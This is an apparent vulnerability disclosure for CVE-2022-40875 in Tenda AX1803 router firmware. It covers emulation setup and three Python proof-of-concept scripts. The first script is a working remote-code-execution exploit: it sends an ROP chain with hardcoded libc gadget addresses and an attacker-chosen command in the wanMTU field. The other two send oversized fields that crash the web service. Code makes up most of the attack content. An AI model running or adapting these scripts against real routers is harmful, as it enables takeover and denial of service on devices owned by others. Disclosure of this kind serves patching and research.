Headline
CVE-2022-40875: Tenda ax1803 is vulnerable to a buffer overflow - Riv4ille
Tenda AX1803 v1.0.0.1 was discovered to contain a heap overflow in the function GetParentControlInfo.
Tenda ax1803 is vulnerable to a buffer overflow****Setting up the environment
Create a br0 NIC:
sudo tunctl -t br0 -u root sudo ifconfig br0 192.168.0.1/24
Copy qemu-arm-static to the corresponding directory on the filesystem and start the tdhttpd service:
sudo chroot . ./qemu-arm-static ./bin/tdhttpd
The first vulnerability
A stack overflow vulnerability exists in the fromAdvSetMacMtuWan function, which can lead to a denial of service or remote code execution vulnerability through a carefully constructed http request.
The proof-of-concept code for the vulnerability is as follows:
import requests,sys from pwn import *
url = sys.argv[1] + “/goform/AdvSetMacMtuWan” cmd = sys.argv[2]
libc_base = 0xfef99000 gadget1 = 0xff08dcdc # mov r0, sp ; blx r3 gadget2 = 0xff01987c # mov r3, r4 ; mov r0, r3 ; pop {r4, pc} system_addr = 0xfefd06c8
payload = '128999999999’+ p32(system_addr) + p32(0xdeadbeef)*3 + p32(gadget2) payload += p32(0xdeadbeef) + p32(gadget1) + cmd payload = "wanMTU=%s&wanSpeed=0&cloneType=0&mac=00:00:00:00:00:01"%payload content_length = len(payload) headers = { "Host":"192.168.0.1", "X-Requested-With":"XMLHttpRequest", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36", "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8", "Origin":"http://192.168.0.1", "Referer":"http://192.168.0.1/main.html", "Content-Length":"%d"%content_length }
r = requests.post(url,headers = headers,data = payload)
The Second vulnerability
A heap overflow vulnerability exists in the GetParentControlInfo function, which can cause a denial of service attack through a carefully constructed http request.
The proof-of-concept code for the vulnerability is as follows:
import requests,sys from pwn import *
url = sys.argv[1] + “/goform/GetParentControlInfo”
payload = 'a’*0x400 payload = 'mac=%s’%payload content_length = len(payload) headers = { "Host":"192.168.0.1", "X-Requested-With":"XMLHttpRequest", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36", "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8", "Origin":"%s"%url, "Referer":"%s/main.html"%url, "Content-Length":"%d"%content_length }
r = requests.post(url,headers = headers,data = payload)
The third vulnerability
A heap overflow vulnerability exists in the setSchedWifi function, which could cause a denial of service by constructing an http request.
The proof-of-concept code for the vulnerability is as follows:
import requests,sys from pwn import *
url = sys.argv[1] + “/goform/openSchedWifi”
payload = 'a’*0x400 payload = 'schedWifiEnable=&schedStartTime=%s&schedEndTime=&timeType=&day=’%payload content_length = len(payload) headers = { "Host":"192.168.0.1", "X-Requested-With":"XMLHttpRequest", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36", "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8", "Origin":"%s"%url, "Referer":"%s/main.html"%url, "Content-Length":"%d"%content_length }
r = requests.post(url,headers = headers,data = payload)